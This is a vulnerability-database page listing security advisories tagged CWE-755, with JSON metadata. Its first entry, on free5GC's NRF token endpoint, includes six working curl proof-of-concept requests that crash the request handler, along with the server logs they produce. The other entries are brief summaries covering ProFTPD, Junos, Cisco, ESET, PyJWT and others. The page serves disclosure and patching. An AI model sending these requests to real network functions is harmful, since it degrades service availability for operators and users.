CWE-755
DiscouragedImproper Handling of Exceptional Conditions
Abstraction: Class · Status: Incomplete
The product does not handle or incorrectly handles an exceptional condition.
686 vulnerabilities reference this CWE, most recent first.
GHSA-F8QV-7X5W-QR48
Vulnerability from github – Published: 2026-05-08 22:56 – Updated: 2026-06-08 23:48Summary
free5GC's NRF root SBI endpoint POST /oauth2/token contains a parser-level type-confusion bug family. The handler in NFs/nrf/internal/sbi/api_accesstoken.go reflects over models.NrfAccessTokenAccessTokenReq, special-cases only plain string and NrfNfManagementNfType fields, and treats every other field as if it were a single models.PlmnId. The parsed *models.PlmnId is then assigned with reflect.Value.Set() to whichever field name the attacker put in the form body, which panics whenever the destination field's real type is incompatible (slice, different struct, primitive). Gin recovery converts each panic into HTTP 500, but the endpoint remains remotely panicable from a single unauthenticated form-encoded request and is repeatedly triggerable across at least 6 confirmed crashing fields.
Note: /oauth2/token is unauthenticated by design (it is the OAuth2 token-issuance endpoint). So this is NOT framed as an auth-bypass finding -- it is a parser bug on an intentionally unauthenticated SBI endpoint.
Details
Validated against the NRF container in the official Docker compose lab.
- Source repo tag: v4.2.1
- Running Docker image: free5gc/nrf:v4.2.1
- Docker validation date: 2026-03-22
- NRF endpoint: http://10.100.200.3:8000
Root cause is in the access-token request parser:
- NFs/nrf/internal/sbi/api_accesstoken.go:52
- NFs/nrf/internal/sbi/api_accesstoken.go:87
- NFs/nrf/internal/sbi/api_accesstoken.go:98
- NFs/nrf/internal/sbi/api_accesstoken.go:100
- NFs/nrf/internal/sbi/api_accesstoken.go:112
The model definition lives in free5gc/openapi:
- models/model_nrf_access_token_access_token_req.go:27
- models/model_nrf_access_token_access_token_req.go:29
- models/model_nrf_access_token_access_token_req.go:30
- models/model_nrf_access_token_access_token_req.go:31
The parser's effective shape is: parse value as *models.PlmnId, then dstField.Set(reflect.ValueOf(parsedPlmnId)). Every destination field that is NOT string and NOT NrfNfManagementNfType falls into this branch, so any time the destination is a slice ([]models.PlmnId, []models.Snssai, []models.PlmnIdNid, []string) or a different pointer type (*models.PlmnIdNid), the reflect.Set call panics with a runtime type-confusion error.
Confirmed crashing fields in this DoS family (all reachable from a single unauthenticated form-encoded POST):
- requesterPlmnList -> panic assigning *models.PlmnId to []models.PlmnId
- requesterSnssaiList -> panic assigning *models.PlmnId to []models.Snssai
- requesterSnpnList -> panic assigning *models.PlmnId to []models.PlmnIdNid
- targetSnpn -> panic assigning *models.PlmnId to *models.PlmnIdNid
- targetSnssaiList -> panic assigning *models.PlmnId to []models.Snssai
- targetNsiList -> panic assigning *models.PlmnId to []string
PoC
Reproduced end-to-end against the running NRF at http://10.100.200.3:8000. Each of the following single requests independently crashes the handler.
requesterPlmnList->[]models.PlmnIdmismatch:
curl -i -X POST http://10.100.200.3:8000/oauth2/token \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'requesterPlmnList={"mcc":"208","mnc":"93"}'
requesterSnssaiList->[]models.Snssaimismatch:
curl -i -X POST http://10.100.200.3:8000/oauth2/token \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'requesterSnssaiList={"mcc":"208","mnc":"93"}'
requesterSnpnList->[]models.PlmnIdNidmismatch:
curl -i -X POST http://10.100.200.3:8000/oauth2/token \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'requesterSnpnList={"mcc":"208","mnc":"93"}'
targetSnpn->*models.PlmnIdNidmismatch:
curl -i -X POST http://10.100.200.3:8000/oauth2/token \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'targetSnpn={"mcc":"208","mnc":"93"}'
targetSnssaiList->[]models.Snssaimismatch:
curl -i -X POST http://10.100.200.3:8000/oauth2/token \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'targetSnssaiList={"mcc":"208","mnc":"93"}'
targetNsiList->[]stringmismatch:
curl -i -X POST http://10.100.200.3:8000/oauth2/token \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'targetNsiList={"mcc":"208","mnc":"93"}'
Observed response (per request, no body returned):
HTTP/1.1 500 Internal Server Error
Content-Length: 0
NRF container logs (docker logs nrf) confirm the reflect.Set type-confusion panic in HTTPAccessTokenRequest, with the panic message changing per field type:
[ERRO][NRF][GIN] panic: reflect.Set: value of type *models.PlmnId is not assignable to type []models.PlmnId
[ERRO][NRF][GIN] panic: reflect.Set: value of type *models.PlmnId is not assignable to type []models.Snssai
[ERRO][NRF][GIN] panic: reflect.Set: value of type *models.PlmnId is not assignable to type []models.PlmnIdNid
[ERRO][NRF][GIN] panic: reflect.Set: value of type *models.PlmnId is not assignable to type *models.PlmnIdNid
[ERRO][NRF][GIN] panic: reflect.Set: value of type *models.PlmnId is not assignable to type []string
INFO][NRF][GIN] | 500 | POST | /oauth2/token |
Impact
Type-confusion panic family (CWE-843) in the form-parser of an unauthenticated, network-reachable, root token-issuance endpoint, with no input validation on field types (CWE-20) and no defensive handling of the resulting panic before reflection (CWE-755).
This is NOT framed as an auth-bypass finding: /oauth2/token is unauthenticated by design. It is also NOT a process-kill DoS: Gin recovery catches each panic and the NRF process keeps running, so legitimate clients can still get tokens between attacker requests.
What the bug realistically gives an off-path attacker:
- A reliable, unauthenticated, repeatable panic primitive on the root token endpoint, reachable from a single form-encoded POST.
- Per-request CPU + log-write cost that is materially higher than a normal validation reject (400) would have been, because the panic generates a stack trace each time.
- A class of at least 6 attacker-selectable form keys that all crash via the same root cause, so partial fixes that harden one field do not close the family.
- Sustained-attack potential: under flood, the panic-amplification can degrade NRF token issuance (more expensive than 400 validation) and pollute logs / rotate out useful diagnostic history.
No Confidentiality impact (HTTP 500 with empty body, no stack trace returned to the caller). No Integrity impact (panic happens before any state change). Availability impact is limited to per-request degradation under sustained attack; a single request does not deny service to other clients.
Affected: free5gc v4.2.1.
Upstream issue: https://github.com/free5gc/free5gc/issues/918 Upstream fix: https://github.com/free5gc/nrf/pull/83
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/free5gc/nrf"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.4.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44325"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-755",
"CWE-843"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-08T22:56:03Z",
"nvd_published_at": "2026-05-27T17:16:37Z",
"severity": "HIGH"
},
"details": "### Summary\nfree5GC\u0027s NRF root SBI endpoint `POST /oauth2/token` contains a parser-level type-confusion bug family. The handler in `NFs/nrf/internal/sbi/api_accesstoken.go` reflects over `models.NrfAccessTokenAccessTokenReq`, special-cases only plain `string` and `NrfNfManagementNfType` fields, and treats every other field as if it were a single `models.PlmnId`. The parsed `*models.PlmnId` is then assigned with `reflect.Value.Set()` to whichever field name the attacker put in the form body, which panics whenever the destination field\u0027s real type is incompatible (slice, different struct, primitive). Gin recovery converts each panic into `HTTP 500`, but the endpoint remains remotely panicable from a single unauthenticated form-encoded request and is repeatedly triggerable across at least 6 confirmed crashing fields.\n\nNote: `/oauth2/token` is unauthenticated by design (it is the OAuth2 token-issuance endpoint). So this is NOT framed as an auth-bypass finding -- it is a parser bug on an intentionally unauthenticated SBI endpoint.\n\n### Details\nValidated against the NRF container in the official Docker compose lab.\n- Source repo tag: `v4.2.1`\n- Running Docker image: `free5gc/nrf:v4.2.1`\n- Docker validation date: 2026-03-22\n- NRF endpoint: `http://10.100.200.3:8000`\n\nRoot cause is in the access-token request parser:\n- `NFs/nrf/internal/sbi/api_accesstoken.go:52`\n- `NFs/nrf/internal/sbi/api_accesstoken.go:87`\n- `NFs/nrf/internal/sbi/api_accesstoken.go:98`\n- `NFs/nrf/internal/sbi/api_accesstoken.go:100`\n- `NFs/nrf/internal/sbi/api_accesstoken.go:112`\n\nThe model definition lives in `free5gc/openapi`:\n- `models/model_nrf_access_token_access_token_req.go:27`\n- `models/model_nrf_access_token_access_token_req.go:29`\n- `models/model_nrf_access_token_access_token_req.go:30`\n- `models/model_nrf_access_token_access_token_req.go:31`\n\nThe parser\u0027s effective shape is: parse value as `*models.PlmnId`, then `dstField.Set(reflect.ValueOf(parsedPlmnId))`. Every destination field that is NOT `string` and NOT `NrfNfManagementNfType` falls into this branch, so any time the destination is a slice (`[]models.PlmnId`, `[]models.Snssai`, `[]models.PlmnIdNid`, `[]string`) or a different pointer type (`*models.PlmnIdNid`), the `reflect.Set` call panics with a runtime type-confusion error.\n\nConfirmed crashing fields in this DoS family (all reachable from a single unauthenticated form-encoded POST):\n- `requesterPlmnList` -\u003e panic assigning `*models.PlmnId` to `[]models.PlmnId`\n- `requesterSnssaiList` -\u003e panic assigning `*models.PlmnId` to `[]models.Snssai`\n- `requesterSnpnList` -\u003e panic assigning `*models.PlmnId` to `[]models.PlmnIdNid`\n- `targetSnpn` -\u003e panic assigning `*models.PlmnId` to `*models.PlmnIdNid`\n- `targetSnssaiList` -\u003e panic assigning `*models.PlmnId` to `[]models.Snssai`\n- `targetNsiList` -\u003e panic assigning `*models.PlmnId` to `[]string`\n\n### PoC\nReproduced end-to-end against the running NRF at `http://10.100.200.3:8000`. Each of the following single requests independently crashes the handler.\n\n1. `requesterPlmnList` -\u003e `[]models.PlmnId` mismatch:\n```\ncurl -i -X POST http://10.100.200.3:8000/oauth2/token \\\n -H \u0027Content-Type: application/x-www-form-urlencoded\u0027 \\\n --data-urlencode \u0027requesterPlmnList={\"mcc\":\"208\",\"mnc\":\"93\"}\u0027\n```\n\n2. `requesterSnssaiList` -\u003e `[]models.Snssai` mismatch:\n```\ncurl -i -X POST http://10.100.200.3:8000/oauth2/token \\\n -H \u0027Content-Type: application/x-www-form-urlencoded\u0027 \\\n --data-urlencode \u0027requesterSnssaiList={\"mcc\":\"208\",\"mnc\":\"93\"}\u0027\n```\n\n3. `requesterSnpnList` -\u003e `[]models.PlmnIdNid` mismatch:\n```\ncurl -i -X POST http://10.100.200.3:8000/oauth2/token \\\n -H \u0027Content-Type: application/x-www-form-urlencoded\u0027 \\\n --data-urlencode \u0027requesterSnpnList={\"mcc\":\"208\",\"mnc\":\"93\"}\u0027\n```\n\n4. `targetSnpn` -\u003e `*models.PlmnIdNid` mismatch:\n```\ncurl -i -X POST http://10.100.200.3:8000/oauth2/token \\\n -H \u0027Content-Type: application/x-www-form-urlencoded\u0027 \\\n --data-urlencode \u0027targetSnpn={\"mcc\":\"208\",\"mnc\":\"93\"}\u0027\n```\n\n5. `targetSnssaiList` -\u003e `[]models.Snssai` mismatch:\n```\ncurl -i -X POST http://10.100.200.3:8000/oauth2/token \\\n -H \u0027Content-Type: application/x-www-form-urlencoded\u0027 \\\n --data-urlencode \u0027targetSnssaiList={\"mcc\":\"208\",\"mnc\":\"93\"}\u0027\n```\n\n6. `targetNsiList` -\u003e `[]string` mismatch:\n```\ncurl -i -X POST http://10.100.200.3:8000/oauth2/token \\\n -H \u0027Content-Type: application/x-www-form-urlencoded\u0027 \\\n --data-urlencode \u0027targetNsiList={\"mcc\":\"208\",\"mnc\":\"93\"}\u0027\n```\n\nObserved response (per request, no body returned):\n```\nHTTP/1.1 500 Internal Server Error\nContent-Length: 0\n```\n\nNRF container logs (`docker logs nrf`) confirm the `reflect.Set` type-confusion panic in `HTTPAccessTokenRequest`, with the panic message changing per field type:\n```\n[ERRO][NRF][GIN] panic: reflect.Set: value of type *models.PlmnId is not assignable to type []models.PlmnId\n[ERRO][NRF][GIN] panic: reflect.Set: value of type *models.PlmnId is not assignable to type []models.Snssai\n[ERRO][NRF][GIN] panic: reflect.Set: value of type *models.PlmnId is not assignable to type []models.PlmnIdNid\n[ERRO][NRF][GIN] panic: reflect.Set: value of type *models.PlmnId is not assignable to type *models.PlmnIdNid\n[ERRO][NRF][GIN] panic: reflect.Set: value of type *models.PlmnId is not assignable to type []string\nINFO][NRF][GIN] | 500 | POST | /oauth2/token |\n```\n\n### Impact\nType-confusion panic family (CWE-843) in the form-parser of an unauthenticated, network-reachable, root token-issuance endpoint, with no input validation on field types (CWE-20) and no defensive handling of the resulting panic before reflection (CWE-755).\n\nThis is NOT framed as an auth-bypass finding: `/oauth2/token` is unauthenticated by design. It is also NOT a process-kill DoS: Gin recovery catches each panic and the NRF process keeps running, so legitimate clients can still get tokens between attacker requests.\n\nWhat the bug realistically gives an off-path attacker:\n- A reliable, unauthenticated, repeatable panic primitive on the root token endpoint, reachable from a single form-encoded POST.\n- Per-request CPU + log-write cost that is materially higher than a normal validation reject (`400`) would have been, because the panic generates a stack trace each time.\n- A class of at least 6 attacker-selectable form keys that all crash via the same root cause, so partial fixes that harden one field do not close the family.\n- Sustained-attack potential: under flood, the panic-amplification can degrade NRF token issuance (more expensive than `400` validation) and pollute logs / rotate out useful diagnostic history.\n\nNo Confidentiality impact (`HTTP 500` with empty body, no stack trace returned to the caller). No Integrity impact (panic happens before any state change). Availability impact is limited to per-request degradation under sustained attack; a single request does not deny service to other clients.\n\nAffected: free5gc v4.2.1.\n\nUpstream issue: https://github.com/free5gc/free5gc/issues/918\nUpstream fix: https://github.com/free5gc/nrf/pull/83",
"id": "GHSA-f8qv-7x5w-qr48",
"modified": "2026-06-08T23:48:13Z",
"published": "2026-05-08T22:56:03Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/free5gc/free5gc/security/advisories/GHSA-f8qv-7x5w-qr48"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44325"
},
{
"type": "WEB",
"url": "https://github.com/free5gc/free5gc/issues/918"
},
{
"type": "WEB",
"url": "https://github.com/free5gc/nrf/pull/83"
},
{
"type": "WEB",
"url": "https://github.com/free5gc/nrf/commit/f7bc77daa7425506af7569f2e61c2a210f5a0423"
},
{
"type": "PACKAGE",
"url": "https://github.com/free5gc/free5gc"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "free5GC NRF: type-confusion panic in POST /oauth2/token structured-form parser via Reflect.Set on incompatible types"
}
GHSA-F92H-3C3J-GGHQ
Vulnerability from github – Published: 2023-01-03 21:30 – Updated: 2023-01-10 06:30In Wi-Fi driver, there is a possible undefined behavior due to incorrect error handling. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: GN20220705066; Issue ID: GN20220705066.
{
"affected": [],
"aliases": [
"CVE-2022-32659"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-755"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-01-03T21:15:00Z",
"severity": "MODERATE"
},
"details": "In Wi-Fi driver, there is a possible undefined behavior due to incorrect error handling. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: GN20220705066; Issue ID: GN20220705066.",
"id": "GHSA-f92h-3c3j-gghq",
"modified": "2023-01-10T06:30:26Z",
"published": "2023-01-03T21:30:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-32659"
},
{
"type": "WEB",
"url": "https://corp.mediatek.com/product-security-bulletin/January-2023"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-F989-XW5V-4W5P
Vulnerability from github – Published: 2022-05-24 16:50 – Updated: 2025-11-04 18:30An arbitrary file copy vulnerability in mod_copy in ProFTPD up to 1.3.5b allows for remote code execution and information disclosure without authentication, a related issue to CVE-2015-3306.
{
"affected": [],
"aliases": [
"CVE-2019-12815"
],
"database_specific": {
"cwe_ids": [
"CWE-755"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-07-19T23:15:00Z",
"severity": "CRITICAL"
},
"details": "An arbitrary file copy vulnerability in mod_copy in ProFTPD up to 1.3.5b allows for remote code execution and information disclosure without authentication, a related issue to CVE-2015-3306.",
"id": "GHSA-f989-xw5v-4w5p",
"modified": "2025-11-04T18:30:34Z",
"published": "2022-05-24T16:50:47Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-12815"
},
{
"type": "WEB",
"url": "https://github.com/proftpd/proftpd/pull/816"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-940889.pdf"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2019/08/msg00006.html"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OJDQ3XUYWO42TJBO53NUWDZRA35QMVEI"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XM5FPBAGSIKV6YJZEPM6GPGJO5JFT7XU"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OJDQ3XUYWO42TJBO53NUWDZRA35QMVEI"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XM5FPBAGSIKV6YJZEPM6GPGJO5JFT7XU"
},
{
"type": "WEB",
"url": "https://seclists.org/bugtraq/2019/Aug/3"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/201908-16"
},
{
"type": "WEB",
"url": "https://tbspace.de/cve201912815proftpd.html"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2019/dsa-4491"
},
{
"type": "WEB",
"url": "http://bugs.proftpd.org/show_bug.cgi?id=4372"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00004.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00022.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00009.html"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2024/Aug/35"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/109339"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-FC92-44CH-WWHV
Vulnerability from github – Published: 2022-05-24 17:14 – Updated: 2022-05-24 17:14In a certain condition, receipt of a specific BGP UPDATE message might cause Juniper Networks Junos OS and Junos OS Evolved devices to advertise an invalid BGP UPDATE message to other peers, causing the other peers to terminate the established BGP session, creating a Denial of Service (DoS) condition. For example, Router A sends a specific BGP UPDATE to Router B, causing Router B to send an invalid BGP UPDATE message to Router C, resulting in termination of the BGP session between Router B and Router C. This issue might occur when there is at least a single BGP session established on the device that does not support 4 Byte AS extension (RFC 4893). Repeated receipt of the same BGP UPDATE can result in an extended DoS condition. This issue affects Juniper Networks Junos OS: 16.1 versions prior to 16.1R7-S6; 16.2 versions prior to 16.2R2-S11; 17.1 versions prior to 17.1R2-S11, 17.1R3-S2; 17.2 versions prior to 17.2R1-S9, 17.2R2-S8, 17.2R3-S3; 17.2X75 versions prior to 17.2X75-D105, 17.2X75-D110, 17.2X75-D44; 17.3 versions prior to 17.3R2-S5, 17.3R3-S7; 17.4 versions prior to 17.4R2-S8, 17.4R3; 18.1 versions prior to 18.1R3-S8; 18.2 versions prior to 18.2R2-S6, 18.2R3-S2; 18.2X75 versions prior to 18.2X75-D12, 18.2X75-D33, 18.2X75-D411, 18.2X75-D420, 18.2X75-D51, 18.2X75-D60; 18.3 versions prior to 18.3R1-S6, 18.3R2-S3, 18.3R3; 18.4 versions prior to 18.4R1-S5, 18.4R3; 18.4 version 18.4R2 and later versions; 19.1 versions prior to 19.1R1-S3, 19.1R2; 19.2 versions prior to 19.2R1-S2, 19.2R2. This issue does not affect Juniper Networks Junos OS prior to 16.1R1. This issue affects Juniper Networks Junos OS Evolved prior to 19.2R2-EVO.
{
"affected": [],
"aliases": [
"CVE-2020-1632"
],
"database_specific": {
"cwe_ids": [
"CWE-755"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-04-15T21:15:00Z",
"severity": "HIGH"
},
"details": "In a certain condition, receipt of a specific BGP UPDATE message might cause Juniper Networks Junos OS and Junos OS Evolved devices to advertise an invalid BGP UPDATE message to other peers, causing the other peers to terminate the established BGP session, creating a Denial of Service (DoS) condition. For example, Router A sends a specific BGP UPDATE to Router B, causing Router B to send an invalid BGP UPDATE message to Router C, resulting in termination of the BGP session between Router B and Router C. This issue might occur when there is at least a single BGP session established on the device that does not support 4 Byte AS extension (RFC 4893). Repeated receipt of the same BGP UPDATE can result in an extended DoS condition. This issue affects Juniper Networks Junos OS: 16.1 versions prior to 16.1R7-S6; 16.2 versions prior to 16.2R2-S11; 17.1 versions prior to 17.1R2-S11, 17.1R3-S2; 17.2 versions prior to 17.2R1-S9, 17.2R2-S8, 17.2R3-S3; 17.2X75 versions prior to 17.2X75-D105, 17.2X75-D110, 17.2X75-D44; 17.3 versions prior to 17.3R2-S5, 17.3R3-S7; 17.4 versions prior to 17.4R2-S8, 17.4R3; 18.1 versions prior to 18.1R3-S8; 18.2 versions prior to 18.2R2-S6, 18.2R3-S2; 18.2X75 versions prior to 18.2X75-D12, 18.2X75-D33, 18.2X75-D411, 18.2X75-D420, 18.2X75-D51, 18.2X75-D60; 18.3 versions prior to 18.3R1-S6, 18.3R2-S3, 18.3R3; 18.4 versions prior to 18.4R1-S5, 18.4R3; 18.4 version 18.4R2 and later versions; 19.1 versions prior to 19.1R1-S3, 19.1R2; 19.2 versions prior to 19.2R1-S2, 19.2R2. This issue does not affect Juniper Networks Junos OS prior to 16.1R1. This issue affects Juniper Networks Junos OS Evolved prior to 19.2R2-EVO.",
"id": "GHSA-fc92-44ch-wwhv",
"modified": "2022-05-24T17:14:46Z",
"published": "2022-05-24T17:14:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-1632"
},
{
"type": "WEB",
"url": "https://kb.juniper.net/JSA11013"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-FCP3-VVV6-VHFH
Vulnerability from github – Published: 2022-05-13 01:16 – Updated: 2022-05-13 01:16A vulnerability in the netconf interface of Cisco IOS XR Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on affected system. The vulnerability is due to improper handling of malformed requests processed by the netconf process. An attacker could exploit this vulnerability by sending malicious requests to the affected software. An exploit could allow the attacker to cause the targeted process to restart, resulting in a DoS condition on the affected system. Cisco Bug IDs: CSCvg95792.
{
"affected": [],
"aliases": [
"CVE-2018-0286"
],
"database_specific": {
"cwe_ids": [
"CWE-755"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-05-02T22:29:00Z",
"severity": "MODERATE"
},
"details": "A vulnerability in the netconf interface of Cisco IOS XR Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on affected system. The vulnerability is due to improper handling of malformed requests processed by the netconf process. An attacker could exploit this vulnerability by sending malicious requests to the affected software. An exploit could allow the attacker to cause the targeted process to restart, resulting in a DoS condition on the affected system. Cisco Bug IDs: CSCvg95792.",
"id": "GHSA-fcp3-vvv6-vhfh",
"modified": "2022-05-13T01:16:27Z",
"published": "2022-05-13T01:16:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-0286"
},
{
"type": "WEB",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180502-iosxr"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/104083"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1040827"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-FFXJ-QGWF-8RRM
Vulnerability from github – Published: 2022-05-11 00:01 – Updated: 2022-05-19 00:00Privilege escalation vulnerability in Windows products of ESET, spol. s r.o. allows attacker to exploit "Repair" and "Uninstall" features what may lead to arbitrary file deletion. This issue affects: ESET, spol. s r.o. ESET NOD32 Antivirus 11.2 versions prior to 15.1.12.0. ESET, spol. s r.o. ESET Internet Security 11.2 versions prior to 15.1.12.0. ESET, spol. s r.o. ESET Smart Security Premium 11.2 versions prior to 15.1.12.0. ESET, spol. s r.o. ESET Endpoint Antivirus 6.0 versions prior to 9.0.2046.0. ESET, spol. s r.o. ESET Endpoint Security 6.0 versions prior to 9.0.2046.0. ESET, spol. s r.o. ESET Server Security for Microsoft Windows Server 8.0 versions prior to 9.0.12012.0. ESET, spol. s r.o. ESET File Security for Microsoft Windows Server 8.0.12013.0. ESET, spol. s r.o. ESET Mail Security for Microsoft Exchange Server 6.0 versions prior to 8.0.10020.0. ESET, spol. s r.o. ESET Mail Security for IBM Domino 6.0 versions prior to 8.0.14011.0. ESET, spol. s r.o. ESET Security for Microsoft SharePoint Server 6.0 versions prior to 8.0.15009.0.
{
"affected": [],
"aliases": [
"CVE-2022-27167"
],
"database_specific": {
"cwe_ids": [
"CWE-755"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-05-10T20:15:00Z",
"severity": "HIGH"
},
"details": "Privilege escalation vulnerability in Windows products of ESET, spol. s r.o. allows attacker to exploit \"Repair\" and \"Uninstall\" features what may lead to arbitrary file deletion. This issue affects: ESET, spol. s r.o. ESET NOD32 Antivirus 11.2 versions prior to 15.1.12.0. ESET, spol. s r.o. ESET Internet Security 11.2 versions prior to 15.1.12.0. ESET, spol. s r.o. ESET Smart Security Premium 11.2 versions prior to 15.1.12.0. ESET, spol. s r.o. ESET Endpoint Antivirus 6.0 versions prior to 9.0.2046.0. ESET, spol. s r.o. ESET Endpoint Security 6.0 versions prior to 9.0.2046.0. ESET, spol. s r.o. ESET Server Security for Microsoft Windows Server 8.0 versions prior to 9.0.12012.0. ESET, spol. s r.o. ESET File Security for Microsoft Windows Server 8.0.12013.0. ESET, spol. s r.o. ESET Mail Security for Microsoft Exchange Server 6.0 versions prior to 8.0.10020.0. ESET, spol. s r.o. ESET Mail Security for IBM Domino 6.0 versions prior to 8.0.14011.0. ESET, spol. s r.o. ESET Security for Microsoft SharePoint Server 6.0 versions prior to 8.0.15009.0.",
"id": "GHSA-ffxj-qgwf-8rrm",
"modified": "2022-05-19T00:00:23Z",
"published": "2022-05-11T00:01:12Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-27167"
},
{
"type": "WEB",
"url": "https://support.eset.com/en/ca8268"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-FH7P-WMPJ-PQF7
Vulnerability from github – Published: 2024-01-18 18:30 – Updated: 2024-01-18 18:30AVEVA PI Server versions 2023 and 2018 SP3 P05 and prior contain a vulnerability that could allow an unauthenticated user to remotely crash the PI Message Subsystem of a PI Server, resulting in a denial-of-service condition.
{
"affected": [],
"aliases": [
"CVE-2023-34348"
],
"database_specific": {
"cwe_ids": [
"CWE-703",
"CWE-754",
"CWE-755"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-01-18T18:15:08Z",
"severity": "HIGH"
},
"details": "\nAVEVA PI Server versions 2023 and 2018 SP3 P05 and prior contain a vulnerability that could allow an unauthenticated user to remotely crash the PI Message Subsystem of a PI Server, resulting in a denial-of-service condition.\n\n\n\n\n",
"id": "GHSA-fh7p-wmpj-pqf7",
"modified": "2024-01-18T18:30:25Z",
"published": "2024-01-18T18:30:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34348"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-018-01"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-FHV5-28VV-H8M8
Vulnerability from github – Published: 2026-06-15 17:28 – Updated: 2026-06-15 17:28[!NOTE] The vulnerability surfaces only when a JWKS fetch fails; an attacker can attempt to provoke that with sustained unknown-kid traffic, but the outcome depends on upstream JWKS-endpoint behavior (rate limiting, transient errors) which is beyond the attacker's control. Impact is reduced auth availability until the next successful fetch, not complete denial of service.
Summary
PyJWKClient.get_signing_key() forces a fresh HTTP request to the JWKS endpoint for every JWT with an unknown kid value, with no rate limiting. Since kid comes from the unverified token header, an attacker can trigger unlimited outbound requests.
Additionally, fetch_data() finally block clears the JWKS cache on network error.
Root Cause
jwt/jwks_client.py:172-198 - get_signing_key(kid) calls get_signing_keys(refresh=True) for unknown kids, bypassing TTL cache with no cooldown. jwt/jwks_client.py:120-122 - finally block writes None to cache on error, clearing valid data.
Impact
- DoS against JWKS endpoint (unlimited requests per invalid token)
- DoS against application (network I/O latency)
- Cascading failure (rate limiting clears cache, breaking legitimate auth)
Suggested Fix
- Add refresh cooldown (refuse refresh more than once per TTL period)
- Move cache write from finally to else block
Affected Versions
All versions with PyJWKClient (2.4.0 through 2.12.1)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.12.1"
},
"package": {
"ecosystem": "PyPI",
"name": "pyjwt"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.13.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-48524"
],
"database_specific": {
"cwe_ids": [
